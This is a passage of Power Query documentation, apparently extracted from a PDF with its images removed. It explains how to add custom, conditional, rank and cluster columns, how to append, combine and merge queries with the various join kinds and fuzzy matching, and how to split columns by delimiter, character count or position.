select the Modulo column, and then select Pivot column from the Any column group.
In the Pivot column dialog box, select the Advanced option button. Make sure Value
column is set to Column1 and Aggregate values function is set to Don't aggregate.
The result of that operation will give you a table with four columns, as shown in the
following image.
After defining the correct data types for your columns, you'll create a table that looks
like the following table, with exactly the three columns that you needed and the shape
that you were looking for.
Add a custom column
Article • 12/17/2022
If you need more flexibility for adding new columns than the ones provided out of the
box in Power Query, you can create your own custom column using the Power Query M
formula language.
Imagine that you have a table with the following set of columns.
Using the Units, Unit Price, and Discount columns, you'd like to create two new
columns:
Total Sale before Discount: Calculated by multiplying the Units column times the
Unit Price column.
Total Sale after Discount: Calculated by multiplying the Total Sale before Discount
column by the net percentage value (one minus the discount value).
The goal is to create a table with new columns that contain the total sales before the
discount and the total sales after the discount.
The initial name of your custom column in the New column name box. You can
rename this column.
A dropdown menu where you can select the data type for your new column.
An Available columns list on the right underneath the Data type selection.
A Custom column formula box where you can enter a Power Query M formula.
To add a new custom column, select a column from the Available columns list. Then,
select the Insert column button below the list to add it to the custom column formula.
You can also add a column by selecting it in the list. Alternatively, you can write your
own formula by using the Power Query M formula language in Custom column formula.
7 Note
If a syntax error occurs when you create your custom column, you'll see a yellow
warning icon, along with an error message and reason.
The result of that operation adds a new Total Sale before Discount column to your
table.
7 Note
If you're using Power Query Desktop, you'll notice that the Data type field isn't
available in Custom column. This means that you'll need to define a data type for
any custom columns after creating the columns. More information: Data types in
Power Query
The result of that operation adds a new Total Sale after Discount column to your table.
The Custom column dialog box appears with the custom column formula you created.
7 Note
Depending on the formula you've used for your custom column, Power Query
changes the settings behavior of your step for a more simplified and native
experience. For this example, the Added custom step changed its behavior from a
standard custom column step to a Multiplication experience because the formula
from that step only multiplies the values from two columns.
Next steps
You can create a custom column in other ways, such as creating a column based on
examples you provide to Power Query Editor. More information: Add a column
from an example
For Power Query M reference information, go to Power Query M function
reference.
Add a conditional column
Article • 12/17/2022
With Power Query, you can create new columns whose values will be based on one or
more conditions applied to other columns in your table.
The Conditional column command is located on the Add column tab, in the General
group.
In this table, you have a field that gives you the CustomerGroup. You also have different
prices applicable to that customer in the Tier 1 Price, Tier 2 Price, and Tier 3 Price fields.
In this example, your goal is to create a new column with the name Final Price based on
the value found in the CustomerGroup field. If the value in the CustomerGroup field is
equal to 1, you'll want to use the value from the Tier 1 Price field; otherwise, you'll use
the value from the Tier 3 Price.
To add this conditional column, select Conditional column. In the Add conditional
column dialog box, you can define three sections numbered in the following image.
1. New column name: You can define the name of your new column. In this example,
you'll use the name Final Price.
2. Conditional clauses: Here you define your conditional clauses. You can add more
clauses by selecting Add clause. Each conditional clause will be tested on the order
shown in the dialog box, from top to bottom. Each clause has four parts:
Column name: In the drop-down list, select the column to use for the
conditional test. For this example, select CustomerGroup.
Operator: Select the type of test or operator for the conditional test. In this
example, the value from the CustomerGroup column has to be equal to 1, so
select equals.
Value: You can enter a value or select a column to be used for the conditional
test. For this example, enter 1.
Output: If the test is positive, the value entered here or the column selected
will be the output. For this example, if the CustomerGroup value is equal to 1,
your Output value should be the value from the Tier 1 Price column.
3. Final Else clause: If none of the clauses above yield a positive test, the output of
this operation will be the one defined here, as a manually entered value or a value
from a column. In this case, the output will be the value from the Tier 3 Price
column.
The result of that operation will give you a new Final Price column.
7 Note
New conditional columns won't have a data type defined. You can add a new step
to define a data type for this newly created column by following the steps
described in Data types in Power Query.
If the value from the CustomerGroup column is equal to 1, the Output will be the
value from the Tier 1 Price column.
If the value from the CustomerGroup column is equal to 2, the Output will be the
value from the Tier 2 Price column.
If none of the previous tests are positive, the Output will be the value from the Tier
3 Price column.
7 Note
At the end of each clause, you can select the ellipsis button (...) to delete, move up,
or move down the clause.
The result of that operation will give you the result that you're looking for.
Rank column (Preview)
Article • 07/30/2022
The Rank column command adds a new column to a table with the ranking defined by
one or more other columns from the table. A Rank method option can be used to
define how ties should be handled.
7 Note
Currently, the rank column feature is only available in Power Query Online.
A 20 0.5
B 30 0.8
C 40 0.2
D 10 0.45
E 20 0.75
The teams have shared a list of ways that they want to rank each other:
Using only the values from the Total Points field where higher values rank higher
using standard competition as the rank method
Using only the values from the Total Points field where higher values rank higher
using dense as the rank method
Ranking first by the Total Points and then by Bonus modifier where higher values
rank higher using the standard competition as rank method
1. With the original table already in Power Query, select the Total Points column.
Then from the Power Query Add column tab, select Rank column.
2. In Rank, Rank by will be the field selected ( Total Points ) and the Rank criteria will
be Higher value ranks higher.
3. By default, the rank method for this dialog is standard competition, so just select
OK. This action will give you a new step with the added Rank column.
1. With the original table already in Power Query, select the Total Points column.
Then from the Power Query Add column tab, select Rank column.
2. In Rank, Rank by will be the field selected ( Total Points ) and the Rank criteria will
be Higher value ranks higher.
3. Select Advanced at the top of the dialog box. This selection enables the advanced
section. In Rank method, change the value from Standard competition to Dense.
4. After selecting the rank method, select OK. This action will give you a new step
with the added Rank column.
2. The rank dialog appears with its advanced section open, with both fields selected
in the Rank by column. Total Points is in the first row and then Bonus modifier
below it. Both rows use the Rank criteria of Higher value ranks higher.
3. Make sure that Rank method at the bottom is set to Standard competition.
4. After verifying the above, select OK. This action will give you a new step with the
added Rank column.
Rank methods
A rank method establishes the strategy in which ties are handled by the ranking
algorithm. This option is only available in the advanced section of the Rank dialog.
The following table lists all three available rank methods and provides a description for
each.
Rank Description
method
Standard Items that compare equally receive the same ranking number, and then a gap is
competition left in the ranking numbers. For example, 1224.
Dense Items that compare equally receive the same ranking number, and the next items
receive the immediately following ranking number. For example, 1223.
Ordinal All items receive distinct ordinal numbers, including items that compare equally.
For example, 1234.
Cluster values
Article • 12/17/2022
Cluster values automatically create groups with similar values using a fuzzy matching
algorithm, and then maps each column's value to the best-matched group. This
transform is very useful when you're working with data that has many different
variations of the same value and you need to combine values into consistent groups.
Consider a sample table with an id column that contains a set of IDs and a Person
column containing a set of variously spelled and capitalized versions of the names
Miguel, Mike, William, and Bill.
In this example, the outcome you're looking for is a table with a new column that shows
the right groups of values from the Person column and not all the different variations of
the same words.
7 Note
The Cluster values feature is available only for Power Query Online.
In the Cluster values dialog box, confirm the column that you want to use to create the
clusters from, and enter the new name of the column. For this case, name this new
column Cluster.
The result of that operation yields the result shown in the next image.
7 Note
For each cluster of values, Power Query picks the most frequent instance from the
selected column as the "canonical" instance. If multiple instances occur with the
same frequency, Power Query picks the first one.
Similarity threshold (optional): This option indicates how similar two values must
be to be grouped together. The minimum setting of 0 causes all values to be
grouped together. The maximum setting of 1 only allows values that match exactly
to be grouped together. The default is 0.8.
Ignore case: When comparing text strings, case is ignored. This option is enabled
by default.
Group by combining text parts: The algorithm tries to combine text parts (such as
combining Micro and soft into Microsoft) to group values.
Show similarity scores: Shows similarity scores between the input values and
computed representative values after fuzzy clustering.
Transformation table (optional): You can select a transformation table that maps
values (such as mapping MSFT to Microsoft) to group them together.
For this example, a new transformation table with the name My transform table is used
to demonstrate how values can be mapped. This transformation table has two columns:
It's important that the transformation table has the same columns and column
names as shown in the previous image (they have to be named "From" and "To"),
otherwise Power Query won't recognize this table as a transformation table, and no
transformation will take place.
Using the previously created query, double-click the Clustered values step, then in the
Cluster values dialog box, expand Fuzzy cluster options. Under Fuzzy cluster options,
enable the Show similarity scores option. For Transformation table (optional), select
the query that has the transform table.
After selecting your transformation table and enabling the Show similarity scores
option, select OK. The result of that operation will give you a table that contains the
same id and Person columns as the original table, but also includes two new columns
on the right called Cluster and Person_Cluster_Similarity. The Cluster column contains
the properly spelled and capitalized versions of the names Miguel for versions of Miguel
and Mike, and William for versions of Bill, Billy, and William. The
Person_Cluster_Similarity column contains the similarity scores for each of the names.
Append queries
Article • 12/17/2022
The append operation creates a single table by adding the contents of one or more
tables to another, and aggregates the column headers from the tables to create the
schema for the new table.
7 Note
When tables that don't have the same column headers are appended, all column
headers from all tables are appended to the resulting table. If one of the appended
tables doesn't have a column header from other tables, the resulting table shows
null values in the respective column, as shown in the previous image in columns C
and D.
You can find the Append queries command on the Home tab in the Combine group.
On the drop-down menu, you'll see two options:
Append queries displays the Append dialog box to add additional tables to the
current query.
Append queries as new displays the Append dialog box to create a new query by
appending multiple tables.
The append operation requires at least two tables. The Append dialog box has two
modes:
Two tables: Combine two table queries together. This mode is the default mode.
Three or more tables: Allow an arbitrary number of table queries to be combined.
7 Note
The tables will be appended in the order in which they're selected, starting with the
Primary table for the Two tables mode and from the primary table in the Tables to
append list for the Three or more tables mode.
To append these tables, first select the Online Sales table. On the Home tab, select
Append queries, which creates a new step in the Online Sales query. The Online Sales
table will be the primary table. The table to append to the primary table will be Store
Sales.
Power Query performs the append operation based on the names of the column
headers found on both tables, and not based on their relative position in the headers
sections of their respective tables. The final table will have all columns from all tables
appended.
In the event that one table doesn't have columns found in another table, null values will
appear in the corresponding column, as shown in the Referer column of the final query.
The new approach for this example is to select Append queries as new, and then in the
Append dialog box, select the Three or more tables option button. In the Available
table(s) list, select each table you want to append, and then select Add. After all the
tables you want appear in the Tables to append list, select OK.
After selecting OK, a new query will be created with all your tables appended.
Combine files overview
Article • 02/17/2023
With Power Query, you can combine multiple files that have the same schema into a
single logical table.
This feature is useful when you want to combine all the files you have in the same folder.
For example, if you have a folder that contains monthly files with all the purchase orders
for your company, you can combine these files to consolidate the orders into a single
view.
Files can come from a variety of sources, such as (but not limited to):
Local folders
SharePoint sites
Azure Blob storage
Azure Data Lake Storage (Gen1 and Gen2)
When working with these sources, you'll notice that they share the same table schema,
commonly referred to as the file system view. The following screenshot shows an
example of the file system view.
In the file system view, the Content column contains the binary representation of each
file.
7 Note
You can filter the list of files in the file system view by using any of the available
fields. It's good practice to filter this view to show only the files you need to
combine, for example by filtering fields such as Extension or Folder Path. More
information: Folder
Selecting any of the [Binary] values in the Content column automatically creates a series
of navigation steps to that specific file. Power Query will try to interpret the binary by
using one of the available connectors, such as Text/CSV, Excel, JSON, or XML.
Table preview
Combine files dialog box
Combined files output
Table preview
When you connect to a data source by using any of the previously mentioned
connectors, a table preview opens. If you're certain that you want to combine all the files
in the folder, select Combine in the lower-right corner of the screen.
Alternatively, you can select Transform data to access the Power Query Editor and
create a subset of the list of files (for example, by using filters on the folder path column
to only include files from a specific subfolder). Then combine files by selecting the
column that contains the binaries in the Content column and then selecting either:
The Combine files command in the Combine group on the Home tab.
The Combine files icon in the column header of the column that contains [Binary]
values.
1. Power Query analyzes the example file (by default, the first file in the list) and
determines the correct file connector to use to open that file.
2. The dialog box provides the file connector experience exactly as if you were to
connect directly to that example file.
If you want to use a different file for the example file, you can choose it from
the Example file drop-down menu.
Optional: You can select Skip files with errors to exclude from the final
output any files that result in errors.
In the following image, Power Query has detected that the first file has a .csv file name
extension, so it uses the Text/CSV connector to interpret the file.
Combined files output
After the Combine files process is finished, Power Query automatically performs the
following actions:
1. Creates an example query that performs all the required extraction steps for a
single file. It uses the file that was selected as the example file in the Combine files
dialog box.
This example query has the name Transform Sample file in the Queries pane.
2. Creates a function query that parameterizes the file/binary input to the example
query. The example query and the function query are linked, so that changes to
the example query are reflected in the function query.
3. Applies the function query to the original query with input binaries (for example,
the folder query) so it applies the function query for binary inputs on each row,
and then expands the resulting data extraction as top-level columns.
4. Creates a new group with the prefix Transform file from and the initial query as
the suffix, and organizes all the components used to create these combined files in
that group.
You can easily combine all files within a given folder, as long as they have the same file
type and structure (including the same columns). You can also apply additional
transformation or extraction steps by modifying the automatically generated example
query, without having to worry about modifying or creating additional function query
steps.
7 Note
You can modify the steps inside the example query to change the function applied
to each binary in your query. The example query is linked to the function, so any
changes made to the example query will be reflected in the function query.
If any of the changes affect column names or column data types, be sure to check
the last step of your output query. Adding a Change column type step can
introduce a step-level error that prevents you from visualizing your table. More
information: Dealing with errors
See also
Combine CSV files
Combine CSV files
Article • 02/17/2023
In Power Query, you can combine multiple files from a given data source. This article
describes how the experience works when the files that you want to combine are CSV
files. More information: Combine files overview
Tip
You can follow along with this example by downloading the sample files used in
this article from this download link . You can place those files in the data source
of your choice, such as a local folder, SharePoint folder, Azure Blob storage, Azure
Data Lake Storage, or other data source that provides the file system view.
For simplicity, the example in this article uses the Folder connector. More information:
Folder
There are 12 CSV files, one for each month of the calendar year 2019. The following
image shows the first 15 rows of the file for the month of January.
The number of rows varies from file to file, but all files have a header section in the first
four rows. They have column headers in the fifth row, and the data for the table begins
in the sixth row and continues through all subsequent rows.
The goal is to combine all 12 files into a single table. This combined table contains the
header row at the top of the table, and includes the source name, date, country, units,
and revenue data for the entire year in separate columns after the header row.
Table preview
When connecting to the folder that hosts the files that you want to combine—in this
example, the name of that folder is CSV Files—you're shown the table preview dialog
box, which displays your folder path in the upper-left corner. The data preview shows
the file system view.
7 Note
In a different situation, you might select Transform data to further filter and
transform your data before combining the files. Selecting Combine is only
recommended when you're certain that the folder contains only the files that you
want to combine.
7 Note
Power Query automatically detects what connector to use based on the first file
found in the list. To learn more about the CSV connector, go to Text/CSV.
For this example, leave all the default settings (Example file set to First file, and the
default values for File origin, Delimiter, and Data type detection).
Now select Transform data in the lower-right corner to go to the output query.
Output query
After selecting Transform data in the Combine files dialog box, you'll be taken back to
the Power Query Editor in the query that you initially created from the connection to the
local folder. The output query now contains the source file name in the left-most
column, along with the data from each of the source files in the remaining columns.
However, the data isn't in the correct shape. You need to remove the top four rows from
each file before combining them. To make this change in each file before you combine
them, select the Transform Sample file query in the Queries pane on the left side of
your screen.
The transformations that need to be added to the Transform Sample file query are:
1. Remove top rows: To perform this operation, select the table icon menu in the
upper-left corner of the table, and then select Remove top rows.
In the Remove top rows dialog box, enter 4, and then select OK.
After selecting OK, your table will no longer have the top four rows.
2. Use first row as headers: Select the table icon again, and then select Use first row
as headers.
The result of that operation will promote the first row of the table to the new
column headers.
After this operation is completed, Power Query by default will try to automatically detect
the data types of the columns and add a new Changed column type step.
However, notice that none of the columns derived from the files (Date, Country, Units,
Revenue) have a specific data type assigned to them. Assign the correct data type to
each column by using the following table.
Date Date
Country Text
Revenue Currency
After defining the data types for each column, you'll be ready to load the table.
7 Note
Verification
To validate that all files have been combined, you can select the filter icon on the
Source.Name column heading, which will display all the names of the files that have
been combined. If you get the warning "List may be incomplete," select Load more at
the bottom of the menu to display more available values in the column.
After you select Load more, all available file names will be displayed.
Merge queries overview
Article • 08/30/2023
A merge queries operation joins two existing tables together based on matching values
from one or multiple columns. You can choose to use different types of joins, depending
on the output you want.
Merging queries
You can find the Merge queries command on the Home tab, in the Combine group.
From the drop-down menu, you'll see two options:
Merge queries: Displays the Merge dialog box, with the selected query as the left
table of the merge operation.
Merge queries as new: Displays the Merge dialog box without any preselected
tables for the merge operation.
Left table for merge: The first selection, from top to bottom of your screen.
Right table for merge: The second selection, from top to bottom of your screen.
7 Note
The position—left or right—of the tables becomes very important when you select
the correct join kind to use.
Sales: The CountryID field is a key or an identifier from the Countries table.
Countries: This table contains the CountryID and the name of the country.
The goal is to join these tables by using the CountryID column from both tables, so you
select the CountryID column from each table. After you make the selections, a message
appears with an estimated number of matches at the bottom of the dialog box.
7 Note
Although this example shows the same column header for both tables, this isn't a
requirement for the merge operation. Column headers don't need to match
between tables. However, it's important to note that the columns must be of the
same data type, otherwise the merge operation might not yield correct results.
You can also select multiple columns to perform the join by selecting Ctrl as you select
the columns. When you do so, the order in which the columns were selected is
displayed in small numbers next to the column headings, starting with 1.
For this example, you have the Sales and Countries tables. Each of the tables has
CountryID and StateID columns, which you need to pair for the join between both
columns.
First select the CountryID column in the Sales table, select Ctrl, and then select the
StateID column. (This will show the small numbers in the column headings.) Next,
perform the same selections in the Countries table. The following image shows the
result of selecting those columns.
7 Note
When selecting multiple columns for a join, the order you select the columns in
each table must match. For example, the first column selected in the left table is
matched with the first column selected in the right table, and so on. Otherwise,
you'll observe incorrect join results.
There can be many suggestions in place but, for this scenario, there's only one
suggestion by the feature, where it maps the column CountryID from the Sales table to
the CountryID column from the Countries table. You can select it and the column-pair-
mapping will be automatically applied to your dialog.
7 Note
Only the column-pair-mapping is suggested. Other options in this dialog, such as
the join kind or fuzzy matching configuration, are out of scope for this suggestion.
From here, you can choose to expand or aggregate the fields from this new table
column, which will be the fields from your right table.
7 Note
Currently, the Power Query Online experience only provides the expand operation
in its interface. The option to aggregate will be added later this year.
Join kinds
A join kind specifies how a merge operation will be performed. The following table
describes the available join kinds in Power Query.
Join kind Icon Description
Left outer All rows from the left table, matching rows from the right table
Right outer All rows from the right table, matching rows from the left table
Fuzzy matching
You use fuzzy merge to apply fuzzy matching algorithms when comparing columns, to
try to find matches across the tables you're merging. You can enable this feature by
selecting the Use fuzzy matching to perform the merge check box in the Merge dialog
box. Expand Fuzzy matching options to view all available configurations.
7 Note
Fuzzy matching is only supported for merge operations over text columns.
Left outer join
Article • 12/17/2022
One of the join kinds available in the Merge dialog box in Power Query is a left outer
join, which keeps all the rows from the left table and brings in any matching rows from
the right table. More information: Merge operations overview
This article uses sample data to show how to do a merge operation with the left outer
join. The sample source tables for this example are:
Sales: This table includes the fields Date, CountryID, and Units. CountryID is a
whole number value that represents the unique identifier from the Countries table.
Countries: This table is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.
In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.
Field from the Sales table Field from the Countries table
CountryID id
The goal is to create a table like the following, where the name of the country appears
as a new Country column in the Sales table as long as the CountryID exists in the
Countries table. If there are no matches between the left and right tables, a null value is
the result of the merge for that row. In the following image, this is shown to be the case
for CountryID 4, which was brought in from the Sales table.
One of the join kinds available in the Merge dialog box in Power Query is a right outer
join, which keeps all the rows from the right table and brings in any matching rows from
the left table. More information: Merge operations overview
This article uses sample data to show how to do a merge operation with the right outer
join. The sample source tables for this example are:
Sales: This table includes the fields Date, CountryID, and Units. The CountryID is a
whole number value that represents the unique identifier from the Countries table.
Countries: This table is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.
In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.
Field from the Sales table Field from the Countries table
CountryID id
The goal is to create a table like the following, where the name of the country appears
as a new Country column in the Sales table. Because of how the right outer join works,
all rows from the right table will be brought in, but only matching rows from the left
table will be kept.
One of the join kinds available in the Merge dialog box in Power Query is a full outer
join, which brings in all the rows from both the left and right tables. More information:
Merge operations overview
This article uses sample data to show how to do a merge operation with the full outer
join. The sample source tables for this example are:
Sales: This table includes the fields Date, CountryID, and Units. CountryID is a
whole number value that represents the unique identifier from the Countries table.
Countries: This is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.
In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.
Field from the Sales table Field from the Countries table
CountryID id
The goal is to create a table like the following, where the name of the country appears
as a new Country column in the Sales table. Because of how the full outer join works, all
rows from both the left and right tables will be brought in, regardless of whether they
only appear in one of the tables.
You can merge on more than one column by selecting and holding Ctrl and then
selecting the columns.
Tip
Take a closer look at the message at the bottom of the dialog box that reads "The
selection matches 4 of 4 rows from the first table, and 3 of 4 rows from the second
table." This message is crucial for understanding the result that you get from this
operation.
In the Countries table, you have the Country Spain with id of 4, but there are no records
for CountryID 4 in the Sales table. That's why only three of four rows from the right
table found a match. All rows from the right table that didn't have matching rows from
the left table will be grouped and shown in a new row in the output table with no values
for the fields from the left table.
From the newly created Countries column after the merge operation, expand the
Country field. Don't select the Use original column name as prefix check box.
After performing this operation, you'll create a table that looks like the following image.
Inner join
Article • 12/17/2022
One of the join kinds available in the Merge dialog box in Power Query is an inner join,
which brings in only matching rows from both the left and right tables. More
information: Merge operations overview
This article uses sample data to show how to do a merge operation with the inner join.
The sample source tables for this example are:
Sales: This table includes the fields Date, CountryID, and Units. CountryID is a
whole number value that represents the unique identifier from the Countries table.
Countries: This is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.
In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.
Field from the Sales table Field from the Countries table
CountryID id
The goal is to create a table like the following, where the name of the country appears
as a new Country column in the Sales table. Because of how the inner join works, only
matching rows from both the left and right tables will be brought in.
Take a closer look at the message at the bottom of the dialog box that reads "The
selection matches 1 of 4 rows from the first table, and 1 of 2 rows from the second
table." This message is crucial to understanding the result that you get from this
operation.
In the Sales table, you have a CountryID of 1 and 2, but neither of these values are
found in the Countries table. That's why the match only found one of four rows in the
left (first) table.
In the Countries table, you have the Country Spain with the id 4, but there are no
records for a CountryID of 4 in the Sales table. That's why only one of two rows from
the right (second) table found a match.
From the newly created Countries column, expand the Country field. Don't select the
Use original column name as prefix check box.
After performing this operation, you'll create a table that looks like the following image.
Left anti join
Article • 12/17/2022
One of the join kinds available in the Merge dialog box in Power Query is a left anti join,
which brings in only rows from the left table that don't have any matching rows from
the right table. More information: Merge operations overview
This article uses sample data to show how to do a merge operation with the left anti
join. The sample source tables for this example are:
Sales: This table includes the fields Date, CountryID, and Units. CountryID is a
whole number value that represents the unique identifier from the Countries table.
Countries: This table is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.
In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.
Field from the Sales table Field from the Countries table
CountryID id
The goal is to create a table like the following, where only the rows from the left table
that don't match any from the right table are kept.
Take a closer look at the message at the bottom of the dialog box that reads "The
selection excludes 1 of 4 rows from the first table." This message is crucial to
understanding the result that you get from this operation.
In the Sales table, you have a CountryID of 1 and 2, but neither of them are found in the
Countries table. That's why the match only found one of four rows in the left (first) table.
In the Countries table, you have the Country Spain with an id of 4, but there are no
records for CountryID 4 in the Sales table. That's why only one of two rows from the
right (second) table found a match.
From the newly created Countries column, expand the Country field. Don't select the
Use original column name as prefix check box.
After doing this operation, you'll create a table that looks like the following image. The
newly expanded Country field doesn't have any values. That's because the left anti join
doesn't bring any values from the right table—it only keeps rows from the left table.
Right anti join
Article • 12/17/2022
One of the join kinds available in the Merge dialog box in Power Query is a right anti
join, which brings in only rows from the right table that don't have any matching rows
from the left table. More information: Merge operations overview
This article uses sample data to show how to do a merge operation with the right anti
join. The sample source tables for this example are:
Sales: This table includes the fields Date, CountryID, and Units. CountryID is a
whole number value that represents the unique identifier from the Countries table.
Countries: This is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.
In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.
Field from the Sales table Field from the Countries table
CountryID id
The goal is to create a table like the following, where only the rows from the right table
that don't match any from the left table are kept. As a common use case, you can find
all the rows that are available in the right table but aren't found in the left table.
Take a closer look at the message at the bottom of the dialog box that reads "The
selection excludes 1 of 2 rows from the second table." This message is crucial to
understanding the result that you get from this operation.
In the Countries table, you have the Country Spain with an id of 4, but there are no
records for CountryID 4 in the Sales table. That's why only one of two rows from the
right (second) table found a match. Because of how the right anti join works, you'll never
see any rows from the left (first) table in the output of this operation.
From the newly created Countries column, expand the Country field. Don't select the
Use original column name as prefix check box.
After performing this operation, you'll create a table that looks like the following image.
The newly expanded Country field doesn't have any values. That's because the right anti
join doesn't bring any values from the left table—it only keeps rows from the right table.
Fuzzy merge
Article • 12/17/2022
Fuzzy merge is a smart data preparation feature you can use to apply fuzzy matching
algorithms when comparing columns, to try to find matches across the tables that are
being merged.
You can enable fuzzy matching at the bottom of the Merge dialog box by selecting the
Use fuzzy matching to perform the merge option button. More information: Merge
operations overview
7 Note
Fuzzy matching is only supported on merge operations over text columns. Power
Query uses the Jaccard similarity algorithm to measure the similarity between pairs
of instances.
Sample scenario
A common use case for fuzzy matching is with freeform text fields, such as in a survey.
For this article, the sample table was taken directly from an online survey sent to a
group with only one question: What is your favorite fruit?
To help standardize these values, in this example you have a Fruits reference table.
7 Note
For simplicity, this Fruits reference table only includes the name of the fruits that
will be needed for this scenario. Your reference table can have as many rows as you
need.
The goal is to create a table like the following, where you've standardized all these
values so you can do more analysis.
Similarity threshold (optional): A value between 0.00 and 1.00 that provides the
ability to match records above a given similarity score. A threshold of 1.00 is the
same as specifying an exact match criteria. For example, Grapes matches with
Graes (missing the letter p) only if the threshold is set to less than 0.90. By default,
this value is set to 0.80.
Ignore case: Allows matching records no matter what the case of the text.
Match by combining text parts: Allows combining text parts to find matches. For
example, Micro soft is matched with Microsoft if this option is enabled.
Show similarity scores: Shows similarity scores between the input and the matches
values after fuzzy matching.
Number of matches (optional): Specifies the maximum number of matching rows
that can be returned for every input row.
Transformation table (optional): Allows matching records based on custom value
mappings. For example, Grapes is matched with Raisins if a transformation table is
provided where the From column contains Grapes and the To column contains
Raisins.
Transformation table
For the example in this article, you can use a transformation table to map the value that
has a missing pair. That value is apls, which needs to be mapped to Apple. Your
transformation table has two columns:
From To
apls Apple
You can go back to the Merge dialog box, and in Fuzzy matching options under
Number of matches, enter 1. Enable the Show similarity scores option, and then, under
Transformation table, select Transform Table from the drop-down menu.
After you select OK, you can go to the merge step. When you expand the column with
table values, you'll notice that besides the Fruit field you'll also see the Similarity score
field. Select both and expand them without adding a prefix.
After expanding these two fields, they'll be added to your table. Note the values you get
for the similarity scores of each value. These scores can help you with further
transformations if needed to determine if you should lower or raise your similarity
threshold.
For this example, the Similarity score serves only as additional information and isn't
needed in the output of this query, so you can remove it. Note how the example started
with nine distinct values, but after the fuzzy merge, there are only four distinct values.
Cross join
Article • 12/17/2022
A cross join is a type of join that returns the Cartesian product of rows from the tables in
the join. In other words, it combines each row from the first table with each row from
the second table.
This article demonstrates, with a practical example, how to do a cross join in Power
Query.
Product: A table with all the generic products that you sell.
Colors: A table with all the product variations, as colors, that you can have in your
inventory.
The goal is to perform a cross-join operation with these two tables to create a list of all
unique products that you can have in your inventory, as shown in the following table.
This operation is necessary because the Product table only contains the generic product
name, and doesn't give the level of detail you need to see what product variations (such
as color) there are.
Perform a cross join
To do a cross-join operation in Power Query, first go to the Product table. From the Add
column tab on the ribbon, select Custom column. More information: Add a custom
column
In the Custom column dialog box, enter whatever name you like in the New column
name box, and enter Colors in the Custom column formula box.
) Important
If your query name has spaces in it, such as Product Colors, the text that you need
to enter in the Custom column formula section has to follow the syntax #"Query
name" . For Product Colors, you need to enter #"Product Colors" .
You can check the name of your queries in the Query settings pane on the right
side of your screen or in the Queries pane on the left side.
After you select OK in the Custom column dialog box, a new column is added to the
table. In the new column heading, select Expand to expand the contents of this newly
created column, and then select OK.
After you select OK, you'll reach your goal of creating a table with all possible
combinations of Product and Colors.
Split columns by delimiter
Article • 12/17/2022
In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by a delimiter.
Home tab—under the Split column dropdown menu inside the Transform group.
Transform tab—under the Split column dropdown menu inside the Text column
group.
Account number
Account name
In this example, you want to split this column into two columns. The values are
delimited by a space—the first space from left to right. To do this split, select the
column, and then select the option to split the column by a delimiter. In Split Column
by Delimiter, apply the following configuration:
7 Note
Power Query will split the column into as many columns as needed. The name of
the new columns will contain the same name as the original column. A suffix that
includes a dot and a number that represents the split sections of the original
column will be appended to the name of the new columns.
The Accounts column has values in pairs separated by a comma. These pairs are
separated by a semicolon. The goal of this example is to split this column into new rows
by using the semicolon as the delimiter.
To do that split, select the Accounts column. Select the option to split the column by a
delimiter. In Split Column by Delimiter, apply the following configuration:
Final Split
Your table still requires one last split column operation. You need to split the Accounts
column by the first comma that it finds. This split will create a column for the account
name and another one for the account number.
To do that split, select the Accounts column and then select Split Column > By
Delimiter. Inside the Split column window, apply the following configuration:
The result of that operation will give you a table with the three columns that you're
expecting. You then rename the columns as follows:
Your final table looks like the one in the following image.
Split columns by number of characters
Article • 12/17/2022
In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by the number of characters.
Home tab—under the Split Column dropdown menu inside the Transform group.
Transform tab—under the Split Column dropdown menu inside the Text Column
group.
In this example, you want to split this column into three columns containing the values
described in the list above.
To do this split, select the column and then select the option to split the column by the
number of characters. In Split column by Number of Characters, apply the following
configuration:
Number of characters: 6
Split: Once, as far left as possible
The result of that operation will give you a table with two columns. One for the account
name and the other one that contains the combined values for the date and units.
7 Note
Power Query will split the column into only two columns. The name of the new
columns will contain the same name as the original column. A suffix containing a
dot and a number that represents the split section of the column will be appended
to the names of the new columns.
Now continue to do the same operation over the new Column1.2 column, but with the
following configuration:
Number of characters: 8
Split: Once, as far left as possible
The result of that operation will yield a table with three columns. Notice the new names
of the two columns on the far right. Column1.2.1 and Column1.2.2 were automatically
created by the split column operation.
You can now change the name of the columns and also define the data types of each
column as follows:
Your final table will look like the one in the following image.
Split columns by number of characters into
rows
The initial table for this example will be the one below, with the columns Group and
Account.
The Account column can hold multiple values in the same cell. Each value has the same
length in characters, with a total of six characters. In this example, you want to split
these values so you can have each account value in its own row.
To do that, select the Account column and then select the option to split the column by
the number of characters. In Split column by Number of Characters, apply the following
configuration:
Number of characters: 6
Split: Repeatedly
Split into: Rows
The result of that operation will give you a table with the same number of columns, but
many more rows because the fragments inside the original cell values in the Account
column are now split into multiple rows.
Split columns by positions
Article • 12/17/2022
In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by positions.
Home tab—under the Split Column dropdown menu inside the Transform group.
Transform tab—under the Split Column dropdown menu inside the Text Column
group.
In this example, you want to split this column into the three columns made from the
values in the list above. To do this split, select the column and then select the option to
split the column by positions. In Split Column by Positions, apply the following
configuration:
Positions: 0,6,14
Positions are zero-based and comma-separated, where position zero is the start
of the string.
7 Note
This operation will first start creating a column from position 0 to position 6, then
from position 7 to position 14. There will be another column should there be values
with a length of 16 or more characters in the current data preview contents.
The result of that operation will give you a table with three columns.
7 Note
Power Query will split the column into only two columns. The name of the new
columns will contain the same name as the original column. A suffix created by a
dot and a number that represents the split section of the column will be appended
to the name of the new columns.
You can now change the name of the columns, and also define the data types of each
column as follows:
Your final table will look the one in the following image.
The Account column can only hold two values in the same cell. Each value has the same
length in characters, with a total of six characters. In this example, you want to split
these values so you can have each account value in its own row. To do that, select the
